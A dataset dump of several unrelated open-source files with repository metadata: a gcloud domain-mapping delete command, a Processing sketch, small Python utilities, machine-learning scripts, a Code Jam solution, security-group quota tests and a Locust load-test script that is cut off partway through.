| 2021-07-04T03:29:44.888340
| 2017-07-24T16:16:33
| 2017-07-24T16:16:33
| 93,699,673
| 0
| 2
| null | 2020-07-24T22:44:28
| 2017-06-08T02:34:17
|
Python
|
UTF-8
|
Python
| false
| false
| 1,812
|
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Surface for deleting an App Engine domain mapping."""
from googlecloudsdk.api_lib.app.api import appengine_domains_api_client as api_client
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.app import flags
from googlecloudsdk.core import log
from googlecloudsdk.core.console import console_io
class Delete(base.DeleteCommand):
"""Deletes a specified domain mapping."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
To delete an App Engine domain mapping, run:
$ {command} '*.example.com'
""",
}
@staticmethod
def Args(parser):
flags.DOMAIN_FLAG.AddToParser(parser)
def Run(self, args):
console_io.PromptContinue(
prompt_string=('Deleting mapping [{0}]. This will stop your app from'
' serving from this domain.'.format(args.domain)),
cancel_on_no=True)
if self.ReleaseTrack() == base.ReleaseTrack.ALPHA:
client = api_client.AppengineDomainsApiAlphaClient.GetApiClient()
else:
client = api_client.AppengineDomainsApiClient.GetApiClient()
client.DeleteDomainMapping(args.domain)
log.DeletedResource(args.domain)
|
[
"kisle.kuhn1@gmail.com"
] |
kisle.kuhn1@gmail.com
|
3c7e5c0670bdcf86f8a00bc3574132e66221f1ea
|
579f04eda7851cd89e04cd39ecf48a0d09f63244
|
/mandala/sketch_cat.pyde
|
4655f0ece0ab99fab7be7870be78a7ab91572cb4
|
[] |
no_license
|
jralipe/ccs221
|
0f378492a380b292e35ff7ec27b4e37cb1992726
|
c70f7834c707c089d2ce01a54b9eda70f50c418f
|
refs/heads/master
| 2020-12-28T18:22:15.919736
| 2020-05-29T00:48:53
| 2020-05-29T00:48:53
| 238,438,446
| 3
| 27
| null | 2020-03-05T11:31:06
| 2020-02-05T11:52:29
|
Python
|
UTF-8
|
Python
| false
| false
| 3,287
|
pyde
|
#Nyancat by Maria Arlyn Fuerte
#BSCS1A
catx = 0
caty = 0
flag = True
def setup():
size(900, 600)
background(25, 25, 112)
def draw():
global catx
global caty
global flag
noStroke()
background(25, 25, 112)
fill(255, 0, 0) #RED
rect(0, caty +150, 200, 20)
fill(255, 165, 0) #ORANGE
rect(0, caty +170, 200, 20)
fill(255, 255, 0) #YELLOW
rect(0, caty + 190, 200, 20)
fill(0, 128, 0) #GREEN
rect(0, caty +210, 200, 20)
fill(0, 0, 255) #BLUE
rect(0, caty +230, 200, 20)
fill(75, 0, 130) #Violet
rect(0, caty +250, 200, 20)
if caty > 280:
flag = False
if caty > 200:
catx +=1
if catx > 250:
caty -=1
if caty < 50:
catx -=1
if catx < 30:
caty +=1
#Pikabody
fill(160)
rect(200, caty +135, 180, 150)
fill(100)
rect(215, caty +150, 150, 120)
fill(160)
rect(215, caty +150, 10, 10)
rect(355, caty +150, 10, 10)
rect(215, caty +260, 10, 10)
#BELT
fill(255)
rect (240, caty+ 130, 30, 170)
#Shadow
fill(0)
rect(190, caty +145, 10, 150) #left
rect(380, caty +145, 10, 150) #right
rect(200, caty +285, 180, 10) #bottom
rect(210, caty +130, 160, 10) #top
rect(200, caty +135, 10, 10) #left
rect(370, caty +135, 10, 10) #right
rect(190, caty +280, 20, 10)
rect(180, caty +290, 10, 20)# backfeet left
rect(180, caty +310, 30, 10)#backfeet bottom
rect(210, caty +290, 10, 20) #backfeet right
rect(230, caty +290, 10, 20)
rect(240, caty +310, 20, 10)
rect(260, caty +290, 10, 30)
#backfeet
fill(160)
rect(190, caty +290, 20, 20)
rect(240, caty +290, 20, 20)
#head
fill(0)
rect(295, caty +220, 140, 40)
rect(305, caty +210, 120, 15)
rect(315, caty +205, 35, 8)
rect(380, caty +205, 35, 8)
rect(315, caty +197, 25, 8)
rect(390, caty +197, 25, 8)
rect(323, caty +189, 10, 8)
rect(398, caty +189, 10, 8)
rect(305, caty +255, 120, 15)
rect(315, caty +270, 100, 20)
rect(320, caty +290, 15, 10)
rect(330, caty +300, 20, 10)
rect(370, caty +290, 15, 10)
rect(380, caty +300, 20, 10)
fill(128)
rect(330, caty +290, 20, 10)
rect(380, caty +290, 20, 10)
rect(315, caty +225, 110, 30)
#eyes
fill(20, 20, 20)
rect(340, caty +230,20, 20)
rect(380, caty +230, 20, 20)
fill(235, 235, 235)
rect(350, caty +240, 10, 10)
rect(390, caty +240, 10, 10)
#cheeks
fill(250, 182, 193)
circle(322, caty +248, 15)
circle(418, caty +248, 15)
#SWORD
fill(50)
rect(400, caty +290, 30, 20)
rect(430, caty +280, 30, 40)
fill(255)
rect(460, caty +290, 90, 20)#BLADE
#shadow
fill(0)
rect(390, caty +300, 10, 20)
rect(400, caty+ 310, 40, 10)
rect(430, caty +320, 40, 10)
rect(460, caty +310, 90, 10)
rect(550, caty +290, 10, 30)
rect(460, caty +280, 90, 10)
rect(420, caty +270, 50, 10)
rect(410, caty +280, 20, 10)
rect(540, caty +290, 10, 10)
|
[
"noreply@github.com"
] |
jralipe.noreply@github.com
|
04aaeca81365d84683d423d2113d3dca18c1ddb6
|
6451afeb63ae2be4974cab898e1f72d3d5633d72
|
/gmailsync/utils.py
|
fc8018f7c83296daadc1a88c73cf96d850af8835
|
[
"Apache-2.0"
] |
permissive
|
albertoalcolea/gmailsync
|
f8fb8bd6bee3911482b6ef64f99d714682405938
|
cf2c1f074c24234284e1cfc2949341df1a9899ba
|
refs/heads/master
| 2022-05-02T22:40:46.881024
| 2022-04-14T17:08:28
| 2022-04-14T17:08:28
| 217,107,647
| 4
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 504
|
py
|
import itertools
import os
def chunked(iterable, size):
it = iter(iterable)
while True:
chunk = tuple(itertools.islice(it, size))
if not chunk:
break
yield chunk
def expand_path(path):
"""
Convert relative paths to absolute paths expanding environment variables, and '~' to
represent the user $HOME directory in filenames.
:param path: path to be expanded.
"""
return os.path.abspath(os.path.expandvars(os.path.expanduser(path)))
|
[
"albertoalcolea@gmail.com"
] |
albertoalcolea@gmail.com
|
0f9da5641c14d6d47418ae74359cbd602a3a8681
|
178eb0567fd21b65df6f95d7342d971fb253f91e
|
/AI/Classifiers/models/load.py
|
d0adbb5c1c02bded01575f019398c91e8808eb4a
|
[] |
no_license
|
Zhaofan-Su/SemanticAnalysis
|
defacbcde5f6c541de9c4cfa37138a449c03ce60
|
f28813bf21d6170ffe826dd7edcad73cc244da9b
|
refs/heads/master
| 2020-05-07T11:59:15.138559
| 2019-04-23T00:53:45
| 2019-04-23T00:53:45
| 180,484,689
| 0
| 0
| null | 2019-04-17T02:46:54
| 2019-04-10T02:20:34
|
Python
|
UTF-8
|
Python
| false
| false
| 2,124
|
py
|
import os
import torch
import torch.nn.functional as F
import datetime
import torch.autograd as autograd
import jieba.posseg as pseg
from .fasttext import FastText
import torchtext.data as data
from .input import Dataset
from torchtext.vocab import Vectors
import os.path as path
def _chinese_tokenizer(sentence):
exclusion = ["e", "x", "y"] # e 叹词 x 非语素词 y 语气词
return [word for (word, flag) in pseg.cut(sentence) if flag not in exclusion]
def load_data(target, config):
text_field = data.Field(tokenize=_chinese_tokenizer)
label_field = data.Field(sequential=False)
train_data, test_data = Dataset.split(target, text_field, label_field, config)
embedding = path.join(path.dirname(path.abspath(__file__)), config.PRETRAINED_EMBEDDING)
cache = path.join(path.dirname(path.abspath(__file__)), ".vector_cache/")
weights = Vectors(name=embedding, cache=cache)
text_field.build_vocab([{key: 1} for key in weights.itos], vectors=weights)
label_field.build_vocab(train_data)
config.EMBED_NUM = len(text_field.vocab)
config.EMBED_DIM = len(weights.vectors[0])
config.CLASS_NUM = len(label_field.vocab) - 1
return text_field, label_field
def load_model(model_name, ckpt, text_field, config):
model = None
if model_name == "FastText":
model = FastText(config, text_field.vocab.vectors)
if config.CUDA:
torch.cuda.set_device(config.DEVICE)
model = model.cuda()
device = config.DEVICE if config.CUDA else "cpu"
model.load_state_dict(torch.load(path.join(path.dirname(path.abspath(__file__)), ckpt), map_location=device))
return model
def predict(model, text_field, label_field, sentence, config):
model.eval()
sentence = text_field.preprocess(sentence)
# while len(sentence) < 3:
# sentence.append("<pad>")
sentence = [[text_field.vocab.stoi[x] for x in sentence]]
x = torch.tensor(sentence)
x = autograd.Variable(x)
if config.CUDA:
x = x.cuda()
output = model(x)
_, pred = torch.max(output, 1)
return label_field.vocab.itos[pred.data[0]+1] == "0"
|
[
"nee_11235@qq.com"
] |
nee_11235@qq.com
|
7f7bc5dacb84f4e18c258d76fd91a9bb8cc3af3b
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/CodeJamData/12/23/12.py
|
da0396d4cf15e8267cd6d9041247bc41bc9c3b63
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,511
|
py
|
# -*- coding:utf-8 -*-
import os, itertools
curr_dir = os.path.dirname(os.path.abspath(__file__))
srcfilename = os.path.join(curr_dir, 'C-large.in')
dstfilename = os.path.join(curr_dir, 'output.txt')
def solve(numbers_):
numbers = sorted(numbers_)
memory = dict((k, [k]) for k in numbers)
for r in xrange(2, len(numbers)):
combinations = itertools.combinations(numbers, r)
for combination in combinations:
s = sum(combination)
if s in memory:
r1 = memory[s]
r2 = combination
return r1, r2
memory[s] = combination
return 'Impossible'
if __name__ == '__main__':
with open(srcfilename, 'rb') as inp:
with open(dstfilename, 'wb') as outp:
lines = inp.readlines()
count = int(lines.pop(0))
outlines = []
for i in xrange(count):
line = lines[i]
numbers = [int(number) for number in line.split(' ')]
numbers.pop(0)
result = solve(numbers)
if result == 'Impossible':
outlines.append('Case #%d: Impossible\n' % (i+1,))
else:
r1, r2 = result
outlines.append('Case #%d:\n' % (i+1,))
outlines.append('%s\n' % ' '.join(['%d' % r1i for r1i in r1]))
outlines.append('%s\n' % ' '.join(['%d' % r2i for r2i in r2]))
outp.writelines(outlines)
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
a2996d418df380689d0ce270efb07b78628d4bc2
|
6f98d1667a5c9d55d0a74dcee77b5c3c777653a5
|
/source/ma20/analysis_stock.py
|
8f57162586da3109aaf4f8b18d1301f607c63bb7
|
[] |
no_license
|
llzhi001/stock_strategy
|
55efec1ed95d9ba862fd71f705a5cca8ad3af751
|
237f9ccda0c806f06b99374a5680c5cb70c07899
|
refs/heads/master
| 2020-12-08T13:19:59.083121
| 2018-04-03T17:09:54
| 2018-04-03T17:09:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,643
|
py
|
# coding=utf-8
'''
Created on Nov 7, 2017-12:40:31 AM
@author: yubangwei_pc
'''
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import os
import tushare as ts
from datetime import datetime
# 考虑拟合20天均线,取导数?
m20_para = {'not_rising_days':5, #连续not_rising_days多天不上涨,说明20天均线横盘或者下跌
'const_rising_days':3 # 连续const_rising_days多天上涨,说明20天均线开始上涨
}
def is_rising(his_data_df, judge_para='ma20', const_times=3):
'''
连续not_rising_days次不增加,紧接着连续const_rising_days次递增,认为是增长的,出现拐点
:功能要单一,只判断上升沿,或者下降沿
'''
if None is his_data_df:
return False
recent_risng_days_th = const_times
if len(his_data_df) < recent_risng_days_th :
return False
for i in range(recent_risng_days_th):
if his_data_df[judge_para][0+i] <= his_data_df[judge_para][1+i]:
return False
return True
def is_not_rising(his_data_df, judge_para='ma20', const_not_rising_times=5):
if None is his_data_df:
return False
if len(his_data_df) < const_not_rising_times :
return False
for i in range(const_not_rising_times):
if his_data_df[judge_para][0+i] > his_data_df[judge_para][1+i]:
return False
return True
def update_stock_code():
with open('.\\stock_code.txt', 'r') as fid:
try:
stock_code_id = fid.readlines()
record_date = stock_code_id[-1]
record_date = pd.Timestamp(record_date)
now_date = pd.Timestamp(datetime.now())
diff_date = now_date - record_date
if (diff_date.days < 20):
return
except:
print("Cannot get date information from stock file")
print("Updating the stocks id from network(...)")
# 上次刷新股票编号的时间超过20天,重新再刷一次
with open('.\\stock_code.txt', 'w+') as fid:
stock_code_df = ts.get_today_all()
for i in stock_code_df.index:
fid.write('%s, %s\n'%(stock_code_df['code'][i], stock_code_df['name'][i]))
fid.write(datetime.now().strftime('%Y-%m-%d'))
def get_all_stock_id_and_name():
'''
返回: id:name形式的字典
'''
update_stock_code()
with open('.\\stock_code.txt', 'r') as fid:
stock_code_id = fid.readlines()
stock_code_id = stock_code_id[:len(stock_code_id)-1]# 最后一行保存的是刷新时间
stock_id_name_info = dict()
for stock_id_name in stock_code_id:
stock_id = stock_id_name.strip().split(',')[0]
stock_name = stock_id_name.strip().split(',')[1]
stock_id_name_info[stock_id] = stock_name
return stock_id_name_info
def Ma20_rising_strategy():
'''根据ma20曲线拐点决定买入还是卖出:如果出现横盘或者下跌就卖出;如果出现上升,就买进。具体是否上升需要参数判断m20_para.
将需要买入的股票编号及其20天均线保存
参考 http://blog.sina.com.cn/s/blog_b598fcc90102xi1d.html
'''
with open('.\\stock_code.txt', 'r') as fid:
stock_code_id = fid.readlines()
stock_code_id = stock_code_id[:len(stock_code_id)-1]# 最后一行保存的是刷新时间
print("The following stocks' 20ma are rising:")
ma20_rising_file = open('.\\ma20\\m20_rising_stocks.txt', 'w+')
for stock_id_name in stock_code_id:
stock_id = stock_id_name.strip().split(',')[0]
stock_name = stock_id_name.strip().split(',')[1]
try:
his_data_df = ts.get_hist_data(stock_id)# 获取的数据是从当前时间开始的倒叙
except:
print("Cannot get %s his data."%stock_id)
continue
if is_rising(his_data_df, 'ma20', m20_para['const_rising_days']) and \
is_not_rising(his_data_df[m20_para['const_rising_days']:], 'ma20', m20_para['not_rising_days']):
print('%s'%stock_id)
plt.plot(his_data_df['ma20'][100:0:-1])# 获取的数据是从当前时间开始的倒叙
#plt.show()
fig_name = '.\\ma20\\%s_%s.png'%(stock_id, stock_name)
plt.savefig(fig_name)
plt.close()
ma20_rising_file.write('%s\n'%stock_id_name)
print('code: %s'%(stock_id_name))
ma20_rising_file.close()
if __name__ == '__main__':
update_stock_code()
Ma20_rising_strategy()
|
[
"qiuyemingchong@163.com"
] |
qiuyemingchong@163.com
|
a99dbfd23d95657ed987f929ac6e3d4f7fd948f8
|
a64f122dd4df3e20bc3e25aca31bb11ec9d55977
|
/Assignment 3/ICA.py
|
507e0eba4db4d38a810c8e4fc5190d3e25708cc8
|
[] |
no_license
|
mbrine555/gatech_ML
|
f9de5e1e1c29e40693030fcf3dce4797339f3ada
|
2a3dea874ac7710104fb891a5199afa9f3c046af
|
refs/heads/master
| 2020-04-16T10:39:44.328425
| 2019-04-10T11:54:37
| 2019-04-10T11:54:37
| 165,512,336
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,002
|
py
|
#%% Imports
import pandas as pd
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
from helpers import nn_arch, nn_reg
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.decomposition import FastICA
out = './ICA/'
np.random.seed(0)
digits = pd.read_hdf('./BASE/datasets.hdf','digits')
digitsX = digits.drop('Class',1).copy().values
digitsY = digits['Class'].copy().values
madelon = pd.read_hdf('./BASE/datasets.hdf','madelon')
madelonX = madelon.drop('Class',1).copy().values
madelonY = madelon['Class'].copy().values
madelonX = StandardScaler().fit_transform(madelonX)
digitsX= StandardScaler().fit_transform(digitsX)
clusters = [2,5,10,15,20,25,30,35,40]
dims = [2,3,4,5,6,7,8,9,10,11]
#raise
#%% data for 1
ica = FastICA(random_state=5)
kurt = {}
for dim in dims:
ica.set_params(n_components=dim)
tmp = ica.fit_transform(madelonX)
tmp = pd.DataFrame(tmp)
tmp = tmp.kurt(axis=0)
kurt[dim] = tmp.abs().mean()
kurt = pd.Series(kurt)
kurt.to_csv(out+'madelon scree.csv')
dims = [2,5,10,15,20,25,30,35,40,45,50,55,60]
ica = FastICA(random_state=5)
kurt = {}
for dim in dims:
ica.set_params(n_components=dim)
tmp = ica.fit_transform(digitsX)
tmp = pd.DataFrame(tmp)
tmp = tmp.kurt(axis=0)
kurt[dim] = tmp.abs().mean()
kurt = pd.Series(kurt)
kurt.to_csv(out+'digits scree.csv')
raise
#%% Data for 2
grid ={'ica__n_components':dims,'NN__alpha':nn_reg,'NN__hidden_layer_sizes':nn_arch}
ica = FastICA(random_state=5)
mlp = MLPClassifier(activation='relu',max_iter=2000,early_stopping=True,random_state=5)
pipe = Pipeline([('ica',ica),('NN',mlp)])
gs = GridSearchCV(pipe,grid,verbose=10,cv=5)
gs.fit(madelonX,madelonY)
tmp = pd.DataFrame(gs.cv_results_)
tmp.to_csv(out+'Madelon dim red.csv')
grid ={'ica__n_components':dims,'NN__alpha':nn_reg,'NN__hidden_layer_sizes':nn_arch}
ica = FastICA(random_state=5)
mlp = MLPClassifier(activation='relu',max_iter=2000,early_stopping=True,random_state=5)
pipe = Pipeline([('ica',ica),('NN',mlp)])
gs = GridSearchCV(pipe,grid,verbose=10,cv=5)
gs.fit(digitsX,digitsY)
tmp = pd.DataFrame(gs.cv_results_)
tmp.to_csv(out+'digits dim red.csv')
raise
#%% data for 3
# Set this from chart 2 and dump, use clustering script to finish up
dim = 45
ica = FastICA(n_components=dim,random_state=10)
madelonX2 = ica.fit_transform(madelonX)
madelon2 = pd.DataFrame(np.hstack((madelonX2,np.atleast_2d(madelonY).T)))
cols = list(range(madelon2.shape[1]))
cols[-1] = 'Class'
madelon2.columns = cols
madelon2.to_hdf(out+'datasets.hdf','madelon',complib='blosc',complevel=9)
dim = 60
ica = FastICA(n_components=dim,random_state=10)
digitsX2 = ica.fit_transform(digitsX)
digits2 = pd.DataFrame(np.hstack((digitsX2,np.atleast_2d(digitsY).T)))
cols = list(range(digits2.shape[1]))
cols[-1] = 'Class'
digits2.columns = cols
digits2.to_hdf(out+'datasets.hdf','digits',complib='blosc',complevel=9)
|
[
"briner.15@osu.edu"
] |
briner.15@osu.edu
|
0716ae0a297c478efb4cabc07dd95d1ade9b0765
|
0c85cba348e9abace4f16dfb70531c70175dac68
|
/cloudroast/networking/networks/api/security_groups/test_security_groups_quotas.py
|
711c5f5a1d12b995b33e7c5f496a7e31ad6fa4c0
|
[
"Apache-2.0"
] |
permissive
|
RULCSoft/cloudroast
|
31157e228d1fa265f981ec82150255d4b7876af2
|
30f0e64672676c3f90b4a582fe90fac6621475b3
|
refs/heads/master
| 2020-04-04T12:20:59.388355
| 2018-11-02T21:32:27
| 2018-11-02T21:32:27
| 155,923,262
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,301
|
py
|
"""
Copyright 2015 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cafe.drivers.unittest.decorators import tags
from cloudcafe.networking.networks.extensions.security_groups_api.constants \
import SecurityGroupsErrorTypes, SecurityGroupsResponseCodes
from cloudroast.networking.networks.fixtures \
import NetworkingSecurityGroupsFixture
class SecurityGroupsQuotasTest(NetworkingSecurityGroupsFixture):
@classmethod
def setUpClass(cls):
"""Setting up test data"""
super(SecurityGroupsQuotasTest, cls).setUpClass()
# Setting up
cls.expected_secgroup = cls.get_expected_secgroup_data()
cls.expected_secgroup.name = 'test_secgroup_quotas'
def tearDown(self):
self.secGroupCleanUp()
super(SecurityGroupsQuotasTest, self).tearDown()
@tags('quotas')
def test_rules_per_group(self):
"""
@summary: Testing security rules quota per group
"""
secgroup = self.create_test_secgroup(self.expected_secgroup)
expected_secrule = self.get_expected_secrule_data()
expected_secrule.security_group_id = secgroup.id
rules_per_group = self.sec.config.max_rules_per_secgroup
self.create_n_security_rules_per_group(expected_secrule,
rules_per_group)
msg = ('Successfully created the expected security rules per group '
'allowed by the quota of {0}').format(rules_per_group)
self.fixture_log.debug(msg)
# Checking the quota is enforced
request_kwargs = dict(
security_group_id=expected_secrule.security_group_id,
raise_exception=False)
resp = self.sec.behaviors.create_security_group_rule(**request_kwargs)
neg_msg = ('(negative) Creating a security rule over the group quota'
' of {0}').format(rules_per_group)
self.assertNegativeResponse(
resp=resp, status_code=SecurityGroupsResponseCodes.CONFLICT,
msg=neg_msg, delete_list=self.delete_secgroups,
error_type=SecurityGroupsErrorTypes.OVER_QUOTA)
@tags('quotas')
def test_groups_per_tenant(self):
"""
@summary: Testing security groups quota per tenant
"""
groups_per_tenant = self.sec.config.max_secgroups_per_tenant
self.create_n_security_groups(self.expected_secgroup,
groups_per_tenant)
# Checking the quota is enforced
request_kwargs = dict(
name=self.expected_secgroup.name,
description=self.expected_secgroup.description,
raise_exception=False)
resp = self.sec.behaviors.create_security_group(**request_kwargs)
neg_msg = ('(negative) Creating a security group over the tenant quota'
' of {0}').format(groups_per_tenant)
status_code = SecurityGroupsResponseCodes.CONFLICT
error_type = SecurityGroupsErrorTypes.OVER_QUOTA
self.assertNegativeResponse(
resp=resp, status_code=status_code, msg=neg_msg,
delete_list=self.delete_secgroups,
error_type=error_type)
@tags('quotas')
def test_rules_per_tenant(self):
"""
@summary: Testing security rules quota per tenant
"""
expected_secrule = self.get_expected_secrule_data()
groups_per_tenant = self.sec.config.max_secgroups_per_tenant
rules_per_tenant = self.sec.config.max_rules_per_tenant
rules_per_group = rules_per_tenant / groups_per_tenant
secgroups = self.create_n_security_groups_w_n_rules(
self.expected_secgroup, expected_secrule, groups_per_tenant,
rules_per_group)
msg = ('Successfully created the expected security rules per tenant '
'allowed by the quota of {0}').format(rules_per_tenant)
self.fixture_log.debug(msg)
# Checking the quota is enforced
request_kwargs = dict(
security_group_id=secgroups[0].id,
raise_exception=False)
resp = self.sec.behaviors.create_security_group_rule(**request_kwargs)
neg_msg = ('(negative) Creating a security rule over the tenant quota'
' of {0}').format(rules_per_tenant)
self.assertNegativeResponse(
resp=resp, status_code=SecurityGroupsResponseCodes.CONFLICT,
msg=neg_msg, delete_list=self.delete_secgroups,
error_type=SecurityGroupsErrorTypes.OVER_QUOTA)
def create_n_security_groups_w_n_rules(self, expected_secgroup,
expected_secrule, groups_num,
rules_num):
"""
@summary: Creating n security groups with n rules
"""
secgroups = self.create_n_security_groups(expected_secgroup,
groups_num)
for group in secgroups:
expected_secrule.security_group_id = group.id
self.create_n_security_rules_per_group(expected_secrule, rules_num)
return secgroups
def create_n_security_groups(self, expected_secgroup, num):
"""
@summary: Creating n security groups
"""
secgroups = []
for x in range(num):
log_msg = 'Creating security group {0}'.format(x + 1)
self.fixture_log.debug(log_msg)
name = 'security_test_group_n_{0}'.format(x + 1)
expected_secgroup.name = name
secgroup = self.create_test_secgroup(expected_secgroup)
secgroups.append(secgroup)
msg = 'Successfully created {0} security groups'.format(num)
self.fixture_log.debug(msg)
return secgroups
def create_n_security_rules_per_group(self, expected_secrule, num):
"""
@summary: Creating n security rules within a security group and
verifying they are created successfully
"""
request_kwargs = dict(
security_group_id=expected_secrule.security_group_id,
raise_exception=False)
for x in range(num):
log_msg = 'Creating rule {0}'.format(x + 1)
self.fixture_log.debug(log_msg)
resp = self.sec.behaviors.create_security_group_rule(
**request_kwargs)
# Fail the test if any failure is found
self.assertFalse(resp.failures)
secrule = resp.response.entity
# Check the Security Group Rule response
self.assertSecurityGroupRuleResponse(expected_secrule, secrule)
msg = ('Successfully created {0} security rules at security group '
'{1}').format(num, expected_secrule.security_group_id)
self.fixture_log.debug(msg)
|
[
"leonardo.maycotte@rackspace.com"
] |
leonardo.maycotte@rackspace.com
|
74d2f041b4f2ac6cdb869ee1926db295164b1264
|
4b6fc63aecf127806b34998cdaef0f7342514dcd
|
/Stress/SIGI_Fase_1/Defensor.py
|
0d84b621c51b08e4bfe546158149c1af5667da44
|
[
"CC0-1.0"
] |
permissive
|
VictorAdad/sigi-api-adad
|
08365166f0443cc5f2c90fa792a63998e185f3f1
|
412511b04b420a82cf6ae5338e401b181faae022
|
refs/heads/master
| 2021-04-29T14:27:21.807529
| 2018-02-16T17:42:04
| 2018-02-16T17:42:04
| 121,772,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,978
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
from locust import HttpLocust, TaskSet, task
from requests_toolbelt import MultipartEncoder
from random import randrange
import requests
import mysql.connector
from mysql.connector import errorcode
import variables
import time
url = variables.url #cambiar formato de url si es necesario (agregar / o cadena vacia)
documentos = variables.documentos
def login(self):
time.sleep(3)
self.client.post(url+"login", {"nombreUsuario":"ana.martinez", "password":"secret"})
print "DEFENSOR LOGIN"
def index(self):
self.client.get(url)
self.wait()
def verMisDefensas(self):
index(self)
time.sleep(3)
print("Ver mis Defensas")
self.client.get(url+"defensa/abogado")
self.wait()
def verDetalleDefensa(self):
idDefensa = findDefensa()
print("Ver Detalle de la defensa: "+str(idDefensa))
if idDefensa!=0:
self.client.get(url+"defensa/"+idDefensa)
self.wait()
def crearEtapasProcesales(self, idDefensa):
print("Crear la etapas procesales")
#audienciaInicial(self, idDefensa, "Control Detención - Audiencia Inicial", "controlDetencion/new/"+idDefensa)
#otrasAudiencias(self, idDefensa, "Otras Audiencias", "audiencia/new/"+idDefensa+"/E")
#acusacion(self, idDefensa, "Acusacion", "acusacion/new/"+idDefensa)
options = randrange(1,4)
print("ETAPA NUMERO: "+str(options))
options = {
1 : audienciaInicial(self, idDefensa, "Control Detención - Audiencia Inicial", "controlDetencion/new/"+str(idDefensa)),
2 : otrasAudiencias(self, idDefensa, "Otras Audiencias", "audiencia/new/"+idDefensa+"/E"),
3 : acusacion(self, idDefensa, "Acusacion", "acusacion/new/"+idDefensa)
}
self.wait()
def audienciaInicial(self, idDefensa, etapa, urlEtapa):
print("Crear la Etapa Procesal: "+etapa+" Para la defensa: "+str(idDefensa))
self.client.get(url+urlEtapa)
i = randrange(0,6)
print("Sube Documento "+documentos[i][0])
m = MultipartEncoder(
fields={
"fecha":"18/07/2016",
"hora":"16:00",
"tipoAudiencia":"Inicial",
"antecedente":"false",
"action":"Crear",
"documentos": (documentos[i][0], open('Files/'+documentos[i][0], 'rb'),documentos[i][1])
})
time.sleep(3)
self.client.post(url+"controlDetencion/"+idDefensa, data = m, headers={'Content-Type': m.content_type})
self.wait()
def otrasAudiencias(self, idDefensa, etapa, urlEtapa):
print("Crear la Etapa Procesal: "+etapa+" Para la defensa: "+str(idDefensa))
self.client.get(url+urlEtapa)
i = randrange(0,4)
print("Sube Documento "+documentos[i][0])
m = MultipartEncoder(
fields={
"clasificacion": "E",
"tipoAudiencia": "Intermedia",
"organoJurisdiccional.id":"10027",
"fechaAudiencia":"29/07/2016",
"horaAudiencia":"10:00",
"fundamentoLegal":"Fundamento legal de la audiencia",
"comentarios":"La Audiencia de ... se llevará a cabo con el fin de ...",
"causaMotivo":"",
"sintesisAudiencia":"Síntesis de la Audiencia ...",
"antecedente":"false",
"documentos": (documentos[i][0], open('Files/'+documentos[i][0], 'r'),documentos[i][1])
})
time.sleep(3)
self.client.post(url+"audiencia/"+idDefensa+"/0", data = m, headers={'Content-Type': m.content_type})
self.wait()
def acusacion(self, idDefensa, etapa, urlEtapa):
print("Crear la Etapa Procesal: "+etapa+" Para la defensa: "+str(idDefensa))
self.client.get(url+urlEtapa)
i = randrange(0,4)
print("Sube Documento "+documentos[i][0])
m = MultipartEncoder(
fields={
"fechaPresentacion":"20/07/2016",
"delitos":"111,149",
"clasificacionLegal":"Clasificación Legal de la Acusación",
"coadyuvanciaAcusacion":"false",
"delitosCoadyuvancia":"",
"fechaAudienciaIntermedia":"25/07/2016",
"horaAudienciaIntermedia":"17:00",
"documentos": (documentos[i][0], open('Files/'+documentos[i][0], 'r'),documentos[i][1])
})
time.sleep(3)
self.client.post(url+"acusacion/"+idDefensa, data = m, headers={'Content-Type': m.content_type})
self.wait()
def GuardarSituacionJuridicaDefensa(self):
idDefensa = findDefensa()
print("Guardar Situació Jurídica de Defensa para Mayores de Edad: "+str(idDefensa))
if idDefensa != 0:
self.client.post(url+"defensa/"+idDefensa, data = {
"edadDelito": "25",
"fechaInicioTermino":"16/07/2016",
"horaInicioTermino": "15:00",
"delitos":"311,48",
"observaciones":"El peticionario se encuentra en una situación ... Para lo cual se recomienda ...",
"defensorAsistio":"",
"defensoresAutorizados":""
})
self.wait()
crearEtapasProcesales(self, idDefensa)
def findDefensa():
defensaId = 0
try:
conn = mysql.connector.connect(user = variables.DB_USER, password=variables.DB_PASS, database = variables.DB_NAME, host =variables.DB_HOST)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exists")
else:
print(err)
else:
cursor = conn.cursor()
query = ("SELECT id FROM defensa WHERE usuario_id = 27 AND edad_delito is null")
print(query)
cursor.execute(query)
